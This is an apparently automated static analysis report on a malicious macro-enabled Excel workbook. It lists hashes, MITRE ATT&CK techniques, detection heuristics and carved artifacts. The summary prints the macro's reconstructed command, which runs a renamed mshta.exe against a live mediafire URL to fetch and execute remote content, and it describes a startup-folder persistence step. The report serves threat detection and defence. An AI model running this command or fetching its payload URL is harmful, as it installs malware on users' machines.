Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 eb2d4627e73e173b…

MALICIOUS

Office (OOXML) / .XLSX

Size: 25.6 KB
Created: 2015-06-05 18:17:20 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2022-06-06
MD5: e0e8ee09d117217c1dc4dab0b4af335c
SHA-1: c6514785cacd888bb1fec642ff45ce59fbb6bbd5
SHA-256: eb2d4627e73e173b9e5b42d2766036d8985e0ceb422ce09bb707239247b92d43
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.003 Windows Command Shell
  • T1218.004 Client Execution: Mshta
  • T1059.005 Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a Workbook_Open macro that executes a command. The script reconstructs the command to be 'wscript C:\ProgramData\mong.com', where 'mong.com' is a copy of mshta.exe. This command is then executed with the argument 'C:\ProgramData\mong.com https://www.mediafire.com/file/s8z2kf4phq9wqbz/11.htm/file', which will launch mshta.exe to download and execute content from the provided URL. Additionally, the script attempts to copy 'zaim.js' to the user's startup folder for persistence. The heuristic 'SE_CLIPBOARD_COMMAND_LURE' indicates the document likely instructs the user to manually paste commands, further supporting the malicious intent.

Heuristics (6)

  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.mediafire.com/file/s8z2kf4phq9wqbz/11.htm/file

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas
    SHA-256: d186117592d34b5fb842bed9f6ee9bc4530e9e2115df4abb53f0810057b81c01
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
    Size: 10331 bytes
    Detection:
      ClamAV: No threats found
      Obfuscation or payload: likely
      Carved macro source contains an auto-exec entry point and execution/download terms.
  • vbaProject_00.bin
    SHA-256: 04a0a0a466cacf276e31f0a6e14c94d1e475b0fae2b22cce87c4af3e6b66918c
    Kind: vba-project
    Source: OOXML VBA project: xl/vbaProject.bin
    Size: 43008 bytes
    Detection:
      ClamAV: No threats found
      Obfuscation or payload: likely
      Carved macro source contains an auto-exec entry point and execution/download terms.